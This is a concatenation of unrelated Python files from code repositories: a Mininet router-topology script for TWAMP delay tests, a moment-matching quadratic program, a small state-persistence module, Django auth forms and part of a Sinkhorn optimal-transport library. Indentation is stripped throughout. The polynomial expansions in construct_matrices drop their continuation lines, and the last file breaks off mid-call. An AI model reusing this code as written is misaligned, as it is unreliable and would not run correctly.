def remove_nodes_from_etc_hosts(net):
print('*** Removing entries from /etc/hosts\n')
# Get /etc/hosts
etc_hosts = python_hosts.hosts.Hosts()
for host in net.hosts:
# Remove all the nodes from /etc/hosts
etc_hosts.remove_all_matching(name=str(host))
# Remove entries related to the management network
# These entries are in the form *.m (e.g. r1.m, controller.m)
# therefore they are not removed during the previous loop
for host in net.hosts:
etc_hosts.remove_all_matching(name='%s.m' % host)
# Write changes to /etc/hosts
etc_hosts.write()
def stop_all():
# Clean Mininet emulation environment
os.system('sudo mn -c')
# Kill all the started daemons
os.system('sudo killall zebra isisd')
def extract_host_pid(dumpline):
temp = dumpline[dumpline.find('pid=') + 4:]
return int(temp[:len(temp) - 2])
def simple_test():
global choosed_sender, choosed_reflector
"Create and test a simple network"
# topo = RoutersTopo()
# net = Mininet(topo=topo, build=False, controller=None)
net = Mininet(topo=None, build=False, controller=None)
create_topo(net)
net.build()
net.start()
print("Dumping host connections")
dumpNodeConnections(net.hosts)
# print "Testing network connectivity"
# net.pingAll()
with open(OUTPUT_PID_TABLE_FILE, "w") as file:
for host in net.hosts:
file.write("%s %d\n" % (host, extract_host_pid(repr(host))))
# Add Mininet nodes to /etc/hosts
if ADD_ETC_HOSTS:
add_nodes_to_etc_hosts()
# Castagnacci-Ditella Progetto
# Step 1. Recuperare sender & Reflector scelti dell'utente
sender = net.get(choosed_sender)
reflector = net.get(choosed_reflector)
# waiting sender to setup (after several test, we noticed that removing the sleep
# will cause this command to fail)
print("Waiting the routers to set up... (40 sec)")
#sleep(20)
# Step 2. Execute on reflector, twampy cmd
print("REFLECTOR", reflector.name, "Is sniffing")
#reflector.cmd("./reflector &")
#sleep(2)
print("SENDER", sender.name, "Is sending (scapy crafted) TWAMP packets")
# Step 4. Execute on sender twampy cmd
#sender.cmd("./sender > sender_results.txt &")
# -----------------------------
CLI(net)
# Remove Mininet nodes from /etc/hosts
if ADD_ETC_HOSTS:
remove_nodes_from_etc_hosts(net)
net.stop()
stop_all()
def parse_arguments():
# Get parser
parser = ArgumentParser(
description='Emulation of a Mininet topology (8 routers running '
'IS-IS, 1 controller out-of-band'
)
parser.add_argument(
'--start-node-managers', dest='start_node_managers',
action='store_true', default=False,
help='Define whether to start node manager on routers or not'
)
parser.add_argument(
'--no-etc-hosts', dest='add_etc_hosts',
action='store_false', default=True,
help='Define whether to add Mininet nodes to /etc/hosts file or not'
)
# Parse input parameters
args = parser.parse_args()
# Return the arguments
return args
def __main():
global ADD_ETC_HOSTS # pylint: disable=global-statement
global START_NODE_MANAGERS # pylint: disable=global-statement
global NODE_MANAGER_GRPC_PORT # pylint: disable=global-statement
global net
global choosed_sender, choosed_reflector
# Castagnacci-Ditella Progetto
possible_routers = ["r1", "r2", "r3", "r4", "r5", "r6", "r7", "r8"]
sender_choosed = False
reflector_chosed = False
while not sender_choosed or not reflector_chosed:
print("Here are the routers in the current mininet topology:")
print("r1\nr2\nr3\nr4\nr5\nr6\nr7\nr8")
print("Please choose a Sender and Receiver to be used for Delay Measurement (TWAMP)")
if not sender_choosed:
choosed_sender = input("Choose the Router 'Sender': ")
if choosed_sender in possible_routers:
sender_choosed = True
if not reflector_chosed:
choosed_reflector = input("Choose the Router 'Reflector': ")
if choosed_reflector in possible_routers:
reflector_chosed = True
os.system("clear")
if not sender_choosed:
print("!! Wrong choice for sender !!")
if not reflector_chosed:
print("!! Wrong choice for reflector !!")
# -----------------------------
# Parse command-line arguments
args = parse_arguments()
# Define whether to start node manager on routers or not
START_NODE_MANAGERS = args.start_node_managers
if START_NODE_MANAGERS:
if NODE_MANAGER_PATH is None:
print('Error: --start-node-managers requires NODE_MANAGER_PATH '
'variable')
print('NODE_MANAGER_PATH variable not set in .env file\n')
sys.exit(-2)
if not os.path.exists(NODE_MANAGER_PATH):
print('Error: --start-node-managers requires NODE_MANAGER_PATH '
'variable')
print('NODE_MANAGER_PATH defined in .env file '
'points to a non existing folder\n')
sys.exit(-2)
if NODE_MANAGER_GRPC_PORT is None:
print('Error: --start-node-managers requires '
'NODE_MANAGER_GRPC_PORT variable')
print('NODE_MANAGER_GRPC_PORT variable not set in .env file\n')
sys.exit(-2)
# Define whether to add Mininet nodes to /etc/hosts file or not
ADD_ETC_HOSTS = args.add_etc_hosts
# Tell mininet to print useful information
setLogLevel('info')
simple_test()
if __name__ == '__main__':
__main()
| [
"carmine.scarpitta@uniroma2.it"
] | carmine.scarpitta@uniroma2.it |
8dde1cb41318b2e39719aa73d12da6ee67a46207 | 9bc8b5b2db293fce019b024312cb5406e06ea8f0 | /optimize.py | 3abfc2426c70371ee6f50cf249cbe04de0962d41 | [] | no_license | lbl9988/convexOptimization | 5246b1e66a6fc26527f0f3bb8daea58b0e566792 | cdfbe347dfd778db7713b6ace712ed837a4aba1e | refs/heads/master | 2021-05-27T06:18:00.584886 | 2014-04-28T19:11:20 | 2014-04-28T19:11:20 | 18,122,039 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,606 | py | #!/usr/bin/env python2
import sys
import math
import numpy as np
import pickle
import matplotlib.pyplot as plt
import itertools
import pylab
import glob
from pylab import plot, show
from numpy import vstack, array, arange
from scipy.cluster.vq import kmeans, vq
from collections import Counter
from cvxopt import matrix, solvers
from cvxopt import spmatrix, sparse
def get_point_dist(p0, p1):
return math.sqrt((p0[0] - p1[0])**2 + (p0[1] - p1[1])**2)
def get_dist(coords1, coords2):
n = len(coords1)
diff = coords1 - coords2
dist = 0.0
for i in range(n):
dist = dist + math.sqrt(diff[i][0]*diff[i][0] + diff[i][1]*diff[i][1])
dist = dist/n
return dist
def compute_moments(dists):
n = int(len(dists))
m1 = 0.0
m2 = 0.0
m3 = 0.0
m4 = 0.0
m5 = 0.0
m6 = 0.0
mean = 0.0
for i in range(n):
mean = mean + dists[i]
mean = mean/n
centered_dists = dists - mean
for i in range(n):
m1 = m1 + centered_dists[i]
m1 = m1/n
for i in range(n):
m2 = m2 + (centered_dists[i]-m1)**2
m3 = m3 + (centered_dists[i]-m1)**3
m4 = m4 + (centered_dists[i]-m1)**4
m2 = m2/n
m3 = m3/n
m4 = m4/n
m3 = m3/(math.sqrt(m2))**3
m4 = m4/(m2**2)
return [mean, m2, m3, m4]
def read_coords(filename):
#print "reading from file " + str(filename)
coords = []
coordfile = open(filename)
for line in coordfile:
words = line.split()
oneCoord = []
for i in range(len(words)):
oneCoord.append(float(words[i]))
coords.append(oneCoord)
coordfile.close()
return coords
def get_com(coords):
centerX = 0.0
centerY = 0.0
n = int(len(coords))
for i in range(n):
centerX = centerX + coords[i][0]
centerY = centerY + coords[i][1]
centerX = centerX/n
centerY = centerY/n
center = [centerX, centerY]
return center
def get_framenum(num):
framenum = 0
if num < 10:
framenum = "00000" + str(num)
elif num < 100:
framenum = "0000" + str(num)
elif num < 1000:
framenum = "000" + str(num)
elif num < 10000:
framenum = "00" + str(num)
else:
framenum = "0" + str(num)
return framenum
def compute_quadratic_programming(Q, p, G, h, A, t):
# minimize 1/2 XtQX + ptX
# subject to GX <= h, AX = t
sol = solvers.qp(Q, p, G, h, A, t)
return sol['x']
def construct_matrices(orig, offset, M1, M2, M3, M4):
n = len(orig)
dim = 4*n
offset = 10.0
orig_square = np.square(orig)
origplusoffset_square = orig_square + 2*offset*orig
+ offset*offset*np.ones(n)
orig_cube = np.power(orig, 3)
origplusoffset_cube = orig_cube + 3*orig_square*offset
+ 3*orig*offset*offset + pow(offset, 3.0)*np.ones(n)
orig_fourth = np.power(orig, 4)
origplusoffset_fourth = orig_fourth + 4*orig_cube*offset
+ 6*orig_square*offset*offset + 4*orig*pow(offset, 3.0)
+ pow(offset, 4.0)*np.ones(n)
Q = 2*spmatrix(1.0, range(dim), range(dim))
p1 = matrix(-2.0*orig)
p2 = matrix(-2.0*orig_square)
p3 = matrix(-2.0*orig_cube)
p4 = matrix(-2.0*orig_fourth)
p = matrix([p1, p2, p3, p4])
G = spmatrix(-1.0, range(dim), range(dim))
h = matrix(0.0, (dim, 1))
ones = matrix(1.0, (1, n))
zeros = matrix(0.0, (1, n))
A1 = matrix([ones, zeros, zeros, zeros])
A2 = matrix([zeros, ones, zeros, zeros])
A3 = matrix([zeros, zeros, ones, zeros])
A4 = matrix([zeros, zeros, zeros, ones])
A = matrix([[A1], [A2], [A3], [A4]])
t1 = n*M1
t2 = n*M2 + n*M1*M1
t3 = n*pow(M2, 1.5)*M3 + 3*n*M1*M2 + n*M1*M1*M1
t4 = n*M2*M2*M4 + 4*n*M1*pow(M2, 1.5)*M3 + 6*n*M1*M1*M2 + n*pow(M1, 4)
t = matrix([t1, t2, t3, t4])
return [Q, p, G, h, A, t]
def solve_newcoords(coordinates, target_moments):
# only considering the x coordinates
# let target_xi = xi + di, di is unknown (i=1,2,..,500, 500 points)
# the four target moments are known, tMxi (i=1,2,3,4)
# number of equations 4, number of unknowns, di, is 500
# this is an underdetermined polynomial system
# assume a and b are the original x and y coordinates of the points
n = len(coordinates)
a = coordinates[:, 0]
b = coordinates[:, 1]
offset = 10.0
[Mx1, Mx2, Mx3, Mx4, My1, My2, My3, My4] = target_moments
[Q, p, G, h, A, t] = construct_matrices(a, offset, Mx1, Mx2, Mx3, Mx4)
sol_X = compute_quadratic_programming(Q, p, G, h, A, t)
print "new x locations:\n", sol_X
[Q, p, G, h, A, t] = construct_matrices(b, offset, My1, My2, My3, My4)
sol_Y = compute_quadratic_programming(Q, p, G, h, A, t)
#print "new y locations:\n", sol_Y
X1 = list(itertools.chain(*array(sol_X[0:n])))
X2 = list(itertools.chain(*array(sol_X[n:2*n])))
X3 = list(itertools.chain(*array(sol_X[2*n:3*n])))
X4 = list(itertools.chain(*array(sol_X[3*n:])))
Y1 = list(itertools.chain(*array(sol_Y[0:n])))
Y2 = list(itertools.chain(*array(sol_Y[n:2*n])))
Y3 = list(itertools.chain(*array(sol_Y[2*n:3*n])))
Y4 = list(itertools.chain(*array(sol_Y[3*n:])))
onethird = 1.0/3.0
X2 = np.sqrt(X2)
Y2 = np.sqrt(Y2)
X3 = np.power(X3, onethird)
Y3 = np.power(Y3, onethird)
X4 = np.sqrt(np.sqrt(X4))
Y4 = np.sqrt(np.sqrt(Y4))
coords1 = np.column_stack((X1, Y1))
coords2 = np.column_stack((X2, Y2))
coords3 = np.column_stack((X3, Y3))
coords4 = np.column_stack((X4, Y4))
dist1 = get_dist(coordinates, coords1)
dist2 = get_dist(coordinates, coords2)
dist3 = get_dist(coordinates, coords3)
dist4 = get_dist(coordinates, coords4)
print dist1, dist2, dist3, dist4
newcoords = coords1
dist = dist1
if dist > dist2:
newcoords = coords2
dist = dist2
if dist > dist3:
newcoords = coords3
dist = dist3
if dist > dist4:
newcoords = coords4
dist = dist4
print get_dist(coordinates, newcoords)
return newcoords
def my_circle_scatter(axes, x_array, y_array, radius=0.5, **kwargs):
for x, y in zip(x_array, y_array):
circle = pylab.Circle((x, y), radius=radius, **kwargs)
axes.add_patch(circle)
return True
def drawcoords(coords, newcoords, imgname):
fig = plt.figure()
ax = fig.add_subplot(111, aspect='equal')
my_circle_scatter(ax, zip(*coords)[0], zip(*coords)[1],
radius=4.9, alpha=0.7, color='g')
my_circle_scatter(ax, zip(*newcoords)[0], zip(*newcoords)[1],
radius=4.9, alpha=0.5, color='r')
ax.set_xlim((0, 1000))
ax.set_ylim((0, 1000))
plt.savefig(imgname)
#plt.show()
if __name__ == '__main__':
step = 3500
framenum = get_framenum(step)
targetfilename = sys.argv[1]
targetCoordinates = np.array(read_coords(targetfilename))
targetX = targetCoordinates[:, 0]
targetY = targetCoordinates[:, 1]
[Mx1, Mx2, Mx3, Mx4] = compute_moments(targetX)
[My1, My2, My3, My4] = compute_moments(targetY)
target_moments = [Mx1, Mx2, Mx3, Mx4, My1, My2, My3, My4]
# distribution to change: calculate deltax and deltay for each point
filename = sys.argv[2]
coordinates = np.array(read_coords(filename))
newcoords = solve_newcoords(coordinates, target_moments)
np.savetxt("newcoords.txt", newcoords)
print "===== target ===== "
print target_moments
print "===== sol ===== "
print compute_moments(newcoords[:, 0]) + compute_moments(newcoords[:, 1])
drawcoords(coordinates, newcoords, "out.png")
| [
"linge.bai@gmail.com"
] | linge.bai@gmail.com |
4152272941dbe857b515676f5a4c8f164df20aee | b3d0f568f6e73dcaa6fe45e3e625f416ce60743e | /mapcreator/persistence.py | 333b0d8c4b6c8381e34007038859365eaa7a67db | [
"CC-BY-4.0",
"MIT",
"LicenseRef-scancode-public-domain"
] | permissive | 3Dmaps/mapcreator | fecf07a86f12ebb467db82a430ff9bae1ebbd58a | f5d0a321905af6bf0c336d0a3e416bf580c8893a | refs/heads/master | 2021-04-28T10:17:28.232729 | 2018-05-02T09:54:52 | 2018-05-02T09:54:52 | 122,063,184 | 1 | 1 | MIT | 2018-05-02T07:39:29 | 2018-02-19T13:02:26 | Python | UTF-8 | Python | false | false | 778 | py | import json
import shutil
from os import path, makedirs
from mapcreator.state import State
STATE_DIR = '.mapcreator'
STATE_FILE = 'state.json'
def init_state():
initial_state = State()
save_state(initial_state)
return initial_state
def state_path():
return path.join(STATE_DIR, STATE_FILE)
def state_exists():
return path.exists(state_path())
def load_state():
if state_exists():
with open(state_path(), 'r') as infile:
return State.from_dict(json.load(infile))
else:
return init_state()
def save_state(state):
if not path.exists(STATE_DIR):
makedirs(STATE_DIR)
with open(state_path(), 'w') as outfile:
json.dump(state.to_dict(), outfile)
def clear_state():
shutil.rmtree(STATE_DIR)
| [
"julius.laitala@relex.fi"
] | julius.laitala@relex.fi |
a6acc0487ea9ab45a61c37a1a14d4f41c46a950f | 7202a05f16571ca9a485f07a3bee610f531879a2 | /personas/forms.py | 9b5d4acb0967d2fec4ffbe9d9d72801465dd0b13 | [] | no_license | yrey420/DjangoMangaka | 59a4ac665838383c8ea30af9f2b6ceef310c3fee | 529a4d0e8e0b42e8ed5d54adbc49eeb18aad5ef8 | refs/heads/master | 2023-01-29T04:37:40.195188 | 2020-12-07T20:50:30 | 2020-12-07T20:50:30 | 318,555,949 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,550 | py | from django import forms
from django.contrib.auth.forms import UserCreationForm
from personas.models import LocalUser
class LoginForm(forms.Form):
username = forms.CharField(
widget=forms.TextInput(
attrs={
"placeholder": "Enter your Username",
"class": "form-control"
}
))
password = forms.CharField(
widget=forms.PasswordInput(
attrs={
"placeholder": "Enter your password",
"class": "form-control"
}
))
class SignUpForm(UserCreationForm):
username = forms.CharField(
widget=forms.TextInput(
attrs={
"placeholder": "Enter your new username",
"class": "form-control"
}
))
email = forms.EmailField(
widget=forms.EmailInput(
attrs={
"placeholder": "Enter your e-Mail",
"class": "form-control"
}
))
password1 = forms.CharField(
widget=forms.PasswordInput(
attrs={
"placeholder": "Enter your new password",
"class": "form-control"
}
))
password2 = forms.CharField(
widget=forms.PasswordInput(
attrs={
"placeholder": "Let's double check your password",
"class": "form-control"
}
))
class Meta:
model = LocalUser
fields = ('username', 'email', 'password1', 'password2')
| [
"yrey415@unab.edu.co"
] | yrey415@unab.edu.co |
e5c5c568489326a5ff8d9196eaf8e9c0da078b97 | 2801ac4b53af45ed051b8eb19b7643f4f81a2132 | /LinSinkhorn.py | 62b9503e5c5a84194c53f0df9a9378ba9f7686d7 | [] | no_license | cxxszz/LOT | eb3a9f06ee0402aff999e45c035f388b9660337a | 2cdd7136e8e7320848c692fa72001b92a8346a7f | refs/heads/main | 2023-08-03T17:22:08.515693 | 2021-09-25T08:32:40 | 2021-09-25T08:32:40 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46,928 | py | import numpy as np
import time
from sklearn.cluster import KMeans
import scipy
from scipy import special
# Here C = C1 * C2 and P = P1 * P2
# Useful for kernel-based methods
def compute_OT(P1, P2, C1, C2):
OT_trans_1 = np.dot(P1.T, C1)
OT_trans_2 = np.dot(C2, P2.T)
OT_trans = np.dot(OT_trans_1, OT_trans_2)
res = np.trace(OT_trans)
return res
def KL(A, B):
Ratio_trans = np.log(A) - np.log(B)
return np.sum(A * Ratio_trans)
def Sinkhorn(C, reg, a, b, max_iter=1000, delta=1e-3, lam=0, time_out=200):
start = time.time()
acc = []
times = []
# K = np.exp(-C/reg)
# Next 3 lines equivalent to K= np.exp(-C/reg), but faster to compute
K = np.empty(C.shape, dtype=C.dtype)
np.divide(C, -reg, out=K)
np.exp(K, out=K)
v = np.ones(np.shape(b)[0])
u_trans = np.dot(K, v) + lam # add regularization to avoid divide 0
err = 1
n_iter = 0
while n_iter < max_iter:
if err > delta:
n_iter = n_iter + 1
# Update u
u = a / u_trans
# Update v
v_trans = np.dot(K.T, u) + lam
v = b / v_trans
# Update the coupling
P = u.reshape((-1, 1)) * K * v.reshape((1, -1))
# Update the error
u_trans = np.dot(K, v) + lam
err = np.sum(np.abs(u * u_trans - a))
# Update the total cost
OT_trans = np.sum(P * C)
if np.isnan(OT_trans) == True:
print("Error: NaN OT value")
return "Error"
else:
acc.append(OT_trans)
end = time.time()
tim_actual = end - start
times.append(tim_actual)
if tim_actual > time_out:
return acc[-1], np.array(acc), np.array(times), P
else:
return acc[-1], np.array(acc), np.array(times), P
return acc[-1], np.array(acc), np.array(times), P
def Sinkhorn_LSE(C, reg, a, b, max_iter=1000, delta=1e-3, lam=0, time_out=200):
start = time.time()
acc = []
times = []
f = np.zeros(np.shape(a)[0])
g = np.zeros(np.shape(b)[0])
err = 1
n_iter = 0
while n_iter < max_iter:
if err > delta:
n_iter = n_iter + 1
# Update f
C_tilde = f[:, None] + g[None, :] - C
C_tilde = C_tilde / reg
f = reg * np.log(a) + f - reg * scipy.special.logsumexp(C_tilde, axis=1)
# Update g
C_tilde = f[:, None] + g[None, :] - C
C_tilde = C_tilde / reg
g = reg * np.log(b) + g - reg * scipy.special.logsumexp(C_tilde, axis=0)
# Update the coupling
C_tilde = f[:, None] + g[None, :] - C
C_tilde = C_tilde / reg
P = np.exp(C_tilde)
# Update the error
err = np.sum(np.abs(np.sum(P, axis=1) - a))
# Update the total cost
OT_trans = np.sum(P * C)
if np.isnan(OT_trans) == True:
print("Error: NaN OT value")
return "Error"
else:
acc.append(OT_trans)
end = time.time()
tim_actual = end - start
times.append(tim_actual)
if tim_actual > time_out:
return acc[-1], np.array(acc), np.array(times), P
else:
return acc[-1], np.array(acc), np.array(times), P
return acc[-1], np.array(acc), np.array(times), P
# Linear RF Sinkhorn: C = C1 * C2
def Lin_RF_Sinkhorn(C1, C2, reg, a, b, rank, seed=49, max_iter=1000, delta=1e-3, lam=0):
start = time.time()
acc = []
times = []
A, B = RF_Approx(-C1, C2, reg, num_samples=rank, seed=seed)
v = np.ones(np.shape(b)[0])
u_trans = np.dot(A, np.dot(B, v)) + lam
err = 1
n_iter = 0
while n_iter < max_iter:
if err > delta:
n_iter = n_iter + 1
# Update u
u = a / u_trans
# Update v
v_trans = np.dot(B.T, np.dot(A.T, u)) + lam
v = b / v_trans
# Update the coupling
P1 = u.reshape((-1, 1)) * A
P2 = B * v.reshape((1, -1))
# Update the error
u_trans = np.dot(A, np.dot(B, v)) + lam
err = np.sum(np.abs(u * u_trans - a))
# Update total cost
OT_trans = compute_OT(P1, P2, C1, C2)
if np.isnan(OT_trans) == True:
print("Error: NaN OT value")
return "Error"
else:
acc.append(OT_trans)
end = time.time()
times.append(end - start)
else:
return acc[-1], np.array(acc), np.array(times), P1, P2
return acc[-1], np.array(acc), np.array(times), P1, P2
# Linear Nys Sinkhorn: C = C1 * C2
def Lin_Nys_Sinkhorn(
C1, C2, reg, a, b, rank, seed=49, max_iter=1000, delta=1e-3, lam=0
):
start = time.time()
acc = []
times = []
V1, V2 = Nys_approx(-C1, C2.T, reg, rank, seed=seed, stable=1e-10)
A = np.dot(V2, np.linalg.inv(V1))
A = A[: len(a), :]
B = V2.T
B = B[:, len(a) :]
v = np.ones(np.shape(b)[0])
u_trans = np.dot(A, np.dot(B, v)) + lam
err = 1
n_iter = 0
while n_iter < max_iter:
if err > delta:
n_iter = n_iter + 1
# Update u
u = a / u_trans
# Update v
v_trans = np.dot(B.T, np.dot(A.T, u)) + lam
v = b / v_trans
# Update the coupling
P1 = u.reshape((-1, 1)) * A
P2 = B * v.reshape((1, -1))
# Update the error
u_trans = np.dot(A, np.dot(B, v)) + lam
err = np.sum(np.abs(u * u_trans - a))
# Update the total cost
OT_trans = compute_OT(P1, P2, C1, C2)
if np.isnan(OT_trans) == True:
print("Error: NaN OT value")
return "Error"
else:
acc.append(OT_trans)
end = time.time()
times.append(end - start)
else:
return acc[-1], np.array(acc), np.array(times), P1, P2
return acc[-1], np.array(acc), np.array(times), P1, P2
def UpdateHubs(X, Y, gamma_1, gamma_2):
Z = np.dot(gamma_1, X) + np.dot(gamma_2, Y)
norm = np.sum(gamma_1 + gamma_2, axis=1)
Z = (Z.T / norm).T
return Z
# Here cost is a function
def UpdatePlans(X, Y, Z, a, b, reg, cost, max_iter=1000, delta=1e-9, lam=0):
C1 = cost(Z, X) # d * n * r
K1 = np.exp(-C1 / reg) # r x n
C2 = cost(Z, Y) # d * m * r
K2 = np.exp(-C2 / reg) # r x m
r = np.shape(Z)[0]
u1, u2 = np.ones(r), np.ones(r)
v1, v2 = np.ones(np.shape(a)[0]), np.ones(np.shape(b)[0])
v1_trans = np.dot(K1.T, u1) # r * n
v2_trans = np.dot(K2.T, u2) # r * m
w = np.ones(r) / r # r
err = 1
n_iter = 0
while n_iter < max_iter:
u1_prev, v1_prev = u1, v1
u2_prev, v2_prev = u2, v2
w_prev = w
if err > delta:
n_iter = n_iter + 1
# Update v1, v2
v1 = a / v1_trans # n
u1_trans = np.dot(K1, v1) # n * r
v2 = b / v2_trans # m
u2_trans = np.dot(K2, v2) # m * r
# Update w
w = (u1 * u1_trans * u2 * u2_trans) ** (1 / 2) # 4 * r
# Update u1, u2
u1 = w / u1_trans # r
u2 = w / u2_trans # r
# Update the error
v1_trans = np.dot(K1.T, u1) # n * r
err_1 = np.sum(np.abs(v1 * v1_trans - a))
v2_trans = np.dot(K2.T, u2) # n * r
err_2 = np.sum(np.abs(v2 * v2_trans - b))
err = err_1 + err_2
if (
np.any(np.isnan(u1))
or np.any(np.isnan(v1))
or np.any(np.isnan(u2))
or np.any(np.isnan(v2))
or np.any(np.isinf(u1))
or np.any(np.isinf(v1))
or np.any(np.isinf(u2))
or np.any(np.isinf(v2))
):
# we have reached the machine precision
# come back to previous solution and quit loop
print("Warning: numerical errors at iteration", n_iter)
u1, v1 = u1_prev, v1_prev
u2, v2 = u2_prev, v2_prev
w = w_prev
break
else:
gamma_1 = u1.reshape((-1, 1)) * K1 * v1.reshape((1, -1))
gamma_2 = u2.reshape((-1, 1)) * K2 * v2.reshape((1, -1))
return gamma_1, gamma_2, w
gamma_1 = u1.reshape((-1, 1)) * K1 * v1.reshape((1, -1))
gamma_2 = u2.reshape((-1, 1)) * K2 * v2.reshape((1, -1))
return gamma_1, gamma_2, w
# Here cost is a function
def UpdatePlans_LSE(X, Y, Z, a, b, reg, cost, max_iter=1000, delta=1e-9, lam=0):
C1 = cost(Z, X)
C2 = cost(Z, Y)
r = np.shape(Z)[0]
f1, f2 = np.zeros(r), np.zeros(r)
g1, g2 = np.zeros(np.shape(a)[0]), np.zeros(np.shape(b)[0])
w = np.ones(r) / r
err = 1
n_iter = 0
while n_iter < max_iter:
f1_prev, g1_prev = f1, g1
f2_prev, g2_prev = f2, g2
w_prev = w
if err > delta:
n_iter = n_iter + 1
# Update g1, g2
C1_tilde = (
f1.reshape(-1, 1) * np.ones((1, np.shape(a)[0]))
+ np.ones((r, 1)) * g1.reshape(1, -1)
- C1
)
C1_tilde = C1_tilde / reg
g1 = reg * np.log(a) + g1 - reg * scipy.special.logsumexp(C1_tilde, axis=0)
C2_tilde = (
f2.reshape(-1, 1) * np.ones((1, np.shape(b)[0]))
+ np.ones((r, 1)) * g2.reshape(1, -1)
- C2
)
C2_tilde = C2_tilde / reg
g2 = reg * np.log(b) + g2 - reg * scipy.special.logsumexp(C2_tilde, axis=0)
# Update w
C1_tilde = (
f1.reshape(-1, 1) * np.ones((1, np.shape(a)[0]))
+ np.ones((r, 1)) * g1.reshape(1, -1)
- C1
)
C1_tilde = C1_tilde / reg
P1 = np.exp(C1_tilde)
C2_tilde = (
f2.reshape(-1, 1) * np.ones((1, np.shape(b)[0]))
+ np.ones((r, 1)) * g2.reshape(1, -1)
- C2
)
C2_tilde = C2_tilde / reg
P2 = np.exp(C2_tilde)
w = (np.sum(P1, axis=1) * np.sum(P2, axis=1)) ** (1 / 2)
log_w = (1 / 2) * (
scipy.special.logsumexp(C1_tilde, axis=1)
+ scipy.special.logsumexp(C2_tilde, axis=1)
)
# Update f1, f2
C1_tilde = (
f1.reshape(-1, 1) * np.ones((1, np.shape(a)[0]))
+ np.ones((r, 1)) * g1.reshape(1, -1)
- C1
)
C1_tilde = C1_tilde / reg
f1 = reg * log_w + f1 - reg * scipy.special.logsumexp(C1_tilde, axis=1)
C2_tilde = (
f2.reshape(-1, 1) * np.ones((1, np.shape(b)[0]))
+ np.ones((r, 1)) * g2.reshape(1, -1)
- C2
)
C2_tilde = C2_tilde / reg
f2 = reg * log_w + f2 - reg * scipy.special.logsumexp(C2_tilde, axis=1)
# Update the coupling P1, P2
C1_tilde = (
f1.reshape(-1, 1) * np.ones((1, np.shape(a)[0]))
+ np.ones((r, 1)) * g1.reshape(1, -1)
- C1
)
C1_tilde = C1_tilde / reg
P1 = np.exp(C1_tilde)
C2_tilde = (
f2.reshape(-1, 1) * np.ones((1, np.shape(b)[0]))
+ np.ones((r, 1)) * g2.reshape(1, -1)
- C2
)
C2_tilde = C2_tilde / reg
P2 = np.exp(C2_tilde)
# Update the error
err_1 = np.sum(np.abs(np.sum(P1, axis=0) - a))
err_2 = np.sum(np.abs(np.sum(P2, axis=0) - b))
err = err_1 + err_2
if (
np.any(np.isnan(f1))
or np.any(np.isnan(g1))
or np.any(np.isnan(f2))
or np.any(np.isnan(g2))
or np.any(np.isinf(f1))
or np.any(np.isinf(g1))
or np.any(np.isinf(f2))
or np.any(np.isinf(g2))
):
# we have reached the machine precision
# come back to previous solution and quit loop
print("Warning: numerical errors at iteration", n_iter)
f1, g1 = f1_prev, g1_prev
f2, g2 = f2_prev, g2_prev
w = w_prev
break
else:
return P1, P2, w
# Update the coupling P1, P2
C1_tilde = (
f1.reshape(-1, 1) * np.ones((1, np.shape(a)[0]))
+ np.ones((r, 1)) * g1.reshape(1, -1)
- C1
)
C1_tilde = C1_tilde / reg
P1 = np.exp(C1_tilde)
C2_tilde = (
f2.reshape(-1, 1) * np.ones((1, np.shape(b)[0]))
+ np.ones((r, 1)) * g2.reshape(1, -1)
- C2
)
C2_tilde = C2_tilde / reg
P2 = np.exp(C2_tilde)
return P1, P2, w
# Same as UpdatePlans where the inputs are no more vectors but rather matrices
def UpdatePlans_Matrix(C1, C2, a, b, reg, max_iter=1000, delta=1e-9, lam=0):
K1 = np.exp(-C1.T / reg) # size: r x n
K2 = np.exp(-C2 / reg) # size: r x m
r = np.shape(C1)[1]
u1, u2 = np.ones(r), np.ones(r)
v1, v2 = np.ones(np.shape(a)[0]), np.ones(np.shape(b)[0])
v1_trans = np.dot(K1.T, u1)
v2_trans = np.dot(K2.T, u2)
w = np.ones(r) / r
err = 1
n_iter = 0
while n_iter < max_iter:
u1_prev, v1_prev = u1, v1
u2_prev, v2_prev = u2, v2
w_prev = w
if err > delta:
n_iter = n_iter + 1
# Update v1, v2
v1 = a / v1_trans
u1_trans = np.dot(K1, v1)
v2 = b / v2_trans
u2_trans = np.dot(K2, v2)
# Update w
w = (u1 * u1_trans * u2 * u2_trans) ** (1 / 2)
# Update u1, u2
u1 = w / u1_trans
u2 = w / u2_trans
# Update the error
v1_trans = np.dot(K1.T, u1)
err_1 = np.sum(np.abs(v1 * v1_trans - a))
v2_trans = np.dot(K2.T, u2)
err_2 = np.sum(np.abs(v2 * v2_trans - b))
err = err_1 + err_2
if (
np.any(np.isnan(u1))
or np.any(np.isnan(v1))
or np.any(np.isnan(u2))
or np.any(np.isnan(v2))
or np.any(np.isinf(u1))
or np.any(np.isinf(v1))
or np.any(np.isinf(u2))
or np.any(np.isinf(v2))
):
# we have reached the machine precision
# come back to previous solution and quit loop
print("Warning: numerical errors at iteration", n_iter)
u1, v1 = u1_prev, v1_prev
u2, v2 = u2_prev, v2_prev
w = w_prev
break
else:
gamma_1 = u1.reshape((-1, 1)) * K1 * v1.reshape((1, -1))
gamma_2 = u2.reshape((-1, 1)) * K2 * v2.reshape((1, -1))
return gamma_1.T, gamma_2.T, w
gamma_1 = u1.reshape((-1, 1)) * K1 * v1.reshape((1, -1))
gamma_2 = u2.reshape((-1, 1)) * K2 * v2.reshape((1, -1))
return gamma_1.T, gamma_2.T, w
# Here cost is a function: only the Squared Euclidean is legal
def FactoredOT(
X,
Y,
a,
b,
reg,
rank,
cost,
max_iter=1000,
delta=1e-3,
max_iter_Update=1000,
delta_Update=1e-9,
lam_Update=0,
LSE=True,
time_out=200,
):
start = time.time()
acc = []
times = []
C = cost(X, Y)
kmeans = KMeans(n_clusters=rank, random_state=0).fit(X)
Z = kmeans.cluster_centers_
w = np.ones(rank) / rank
gamma1 = w.reshape((-1, 1)) * a.reshape((1, -1))
gamma2 = w.reshape((-1, 1)) * b.reshape((1, -1))
err = 1
niter = 0
while niter < max_iter:
gamma1_prev = gamma1
gamma2_prev = gamma2
w_prev = w
if err > delta:
niter = niter + 1
if LSE == False:
gamma1, gamma2, w = UpdatePlans(
X,
Y,
Z,
a,
b,
reg,
cost,
max_iter=max_iter_Update,
delta=delta_Update,
lam=lam_Update,
)
else:
gamma1, gamma2, w = UpdatePlans_LSE(
X,
Y,
Z,
a,
b,
reg,
cost,
